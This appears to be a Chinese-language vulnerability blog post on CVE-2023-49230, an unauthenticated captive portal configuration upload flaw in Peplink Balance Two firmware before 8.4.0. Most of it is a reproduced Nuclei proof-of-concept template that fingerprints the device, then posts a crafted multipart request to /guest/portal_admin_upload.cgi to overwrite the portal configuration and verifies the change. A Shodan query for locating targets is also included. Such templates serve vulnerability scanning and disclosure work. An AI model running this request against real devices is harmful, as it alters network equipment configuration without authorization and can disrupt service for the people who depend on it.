Peplink Balance Two 未授权配置上传漏洞

漏洞信息

漏洞名称: Peplink Balance Two 未授权配置上传漏洞

漏洞编号:

  • CVE: CVE-2023-49230

漏洞类型: 未授权访问

漏洞等级: 高危

漏洞描述: Peplink Balance Two是一款广泛使用的网络负载均衡设备,适用于企业级网络环境,提供高效的流量管理和网络优化功能。该设备在多个行业中有广泛应用,特别是在需要高可用性和网络性能优化的场景中。该设备的一个漏洞存在于8.4.0之前的版本中,允许未经认证的攻击者修改捕获门户配置。此漏洞的根源在于/guest/portal_admin_upload.cgi接口缺少适当的授权检查,攻击者可以通过此接口上传文件,修改配置,这些更改会在/guest/preview.cgi?portal_id=1中反映出来。这种未授权访问漏洞可能导致攻击者修改网络配置,进而可能引发服务中断、数据泄露或其他安全风险。由于攻击不需要认证,且可以远程执行,因此该漏洞的安全风险较高,可能被自动化工具利用。

产品厂商: peplink

产品名称: balance_two_firmware

影响版本: version < 8.4.0

搜索语法: html:”PEPLINK”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/37785df0460b7141ce4315082d161a53ad108cfa/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99

id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: peplink
    product: balance_two_firmware
    shodan-query: html:"PEPLINK"
  tags: cve,cve2023,peplink,intrusive,file-upload

flow: http(1) && http(2) && http(3)
variables:
  button_value: "{{randstr}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        words:
          - 'Peplink'
        internal: true

  - raw:
      - |
         POST /guest/portal_admin_upload.cgi HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="option"

         edit_page
         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="mode"

         submit
         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="portal_id"

         1
         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="data"

         {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{button_value}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="logo_action"

         x
         -----------------------------370611892836891531633729116268
         Content-Disposition: form-data; name="logo"; filename=""
         Content-Type: application/octet-stream

         -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
        internal: true

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{button_value}}')"
          - "status_code == 200"
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
Peplink Balance Two 未授权配置上传漏洞
http://example.com/2025/07/11/github_847262297/
作者
lianccc
发布于
2025年7月11日
许可协议